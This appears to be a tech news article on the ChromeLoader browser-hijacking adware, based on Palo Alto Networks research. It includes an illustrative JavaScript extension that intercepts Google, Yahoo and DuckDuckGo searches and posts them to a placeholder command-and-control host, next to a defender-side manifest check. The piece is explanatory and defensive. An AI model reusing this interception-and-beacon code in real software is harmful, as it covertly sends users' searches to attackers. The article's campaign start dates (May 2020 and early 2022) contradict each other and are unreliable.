Cyberthreat to user data on Google’s search engine leaks private information / Digital Information World
Since May 2020, an ongoing malware campaign has been affecting multiple browsers, including Microsoft Edge, Mozilla Firefox and Google Chrome. Before looking at the threat this adware campaign poses to user data, what is adware? Adware is software through which threat actors display advertisements: when a person opens a website, ads are shown in pop-up windows or injected into the page the user is viewing.
Researchers at the network security company Palo Alto Networks have analysed a notorious adware family that targets search-engine requests, using a malicious browser extension to run its payload. The malware, dubbed ChromeLoader, is a pervasive and damaging browser hijacker. It serves malicious advertisements, redirects user traffic to advertising sites, changes browser settings and steals confidential information from organisations, which it then exposes. The variant described by Palo Alto runs as a browser extension and collects the victim's search-engine queries, so it acts both as adware and as an information stealer, harvesting users' search data without their knowledge or consent.
How does this malware work? Simply put, the extension installs a listener that intercepts every outgoing request and checks whether it is a search request to Google, Yahoo or DuckDuckGo. When a request matches, the extension forwards the user's search query to the attackers' command-and-control (C2) servers, the infrastructure from which the malware also receives its instructions. The criminals thus obtain a running record of the victim's interests and preferences. Palo Alto published its findings on July 12, 2022, although the malicious activity had begun in early 2022. During that time the software underwent several modifications: the operators periodically rework the code to make it more capable and harder to detect, and Palo Alto expects this refinement to continue.
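The interception logic described above, as an added example written for this article rather than code from Palo Alto Networks or from any ChromeLoader sample. The search hostnames and query parameter names, the victim identifier and the placeholder C2 address are assumptions; the manifest check at the end is a defender-side heuristic added here, not something from the report.

```javascript
// Added example: reconstruction of the request-listener technique the
// article describes. Hostnames, parameter names and the C2 URL are assumptions.
const SEARCH_ENGINES = {
  "www.google.com": "q",   // https://www.google.com/search?q=...
  "search.yahoo.com": "p", // https://search.yahoo.com/search?p=...
  "duckduckgo.com": "q",   // https://duckduckgo.com/?q=...
};

// Returns { engine, query } when the URL is a search request to one of the
// engines above, otherwise null (including for unparsable input).
function extractSearchQuery(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return null;
  }
  const param = SEARCH_ENGINES[url.hostname];
  if (!param) return null;
  const query = url.searchParams.get(param);
  if (!query) return null;
  return { engine: url.hostname, query };
}

// Placeholder C2 endpoint (not a real indicator).
const C2_URL = "https://c2.example.invalid/collect";

// Builds the beacon a hijacking extension would POST to its C2 for each
// intercepted search; null when the request is not a search.
function buildBeacon(rawUrl, victimId) {
  const hit = extractSearchQuery(rawUrl);
  if (!hit) return null;
  return { url: C2_URL, body: JSON.stringify({ id: victimId, ...hit }) };
}

// Listener registration as it would appear in the extension's background
// script. Only runs inside a browser that exposes the webRequest API; the
// "<all_urls>" filter is what lets the extension see every outgoing request.
if (typeof chrome !== "undefined" && chrome.webRequest) {
  chrome.webRequest.onBeforeRequest.addListener(
    (details) => {
      const beacon = buildBeacon(details.url, "victim-1");
      if (beacon) fetch(beacon.url, { method: "POST", body: beacon.body });
    },
    { urls: ["<all_urls>"] }
  );
}

// Defender side (heuristic added here): flag an extension manifest whose
// permissions would let it sniff searches, i.e. webRequest combined with a
// host pattern that covers all sites or one of the search engines.
function manifestCanSniffSearches(manifest) {
  const perms = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ];
  const hasWebRequest = perms.includes("webRequest");
  const broadHosts = perms.some(
    (p) =>
      p === "<all_urls>" ||
      /^\*:\/\/\*\//.test(p) ||
      Object.keys(SEARCH_ENGINES).some((h) => p.includes(h))
  );
  return hasWebRequest && broadHosts;
}
```

The extraction step is deliberately a pure function so it can be unit-tested and reused in a detection rule: the same matcher that tells the malware which requests to steal tells a defender which manifests and network beacons to look for.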
Explaining ChromeLoader in more detail, Palo Alto describes it as multi-stage malware with several stages along its attack chain. The researchers identified four ChromeLoader variants: three target Windows systems and a fourth targets macOS. The malware's authors also used obfuscation to hide their tracks; in the search-stealing component they used a technique called Switch Case Oriented Programming, which makes detection and analysis considerably harder for security teams.
Threats of this kind need to be detected and mitigated. Companies should provide additional security controls to protect users against data breaches, and it is critical for businesses to understand this malicious behaviour and equip themselves with tools to deal with such threats.
Read next: Vishing scam rates reach triple phishing scams and scammers are on the loose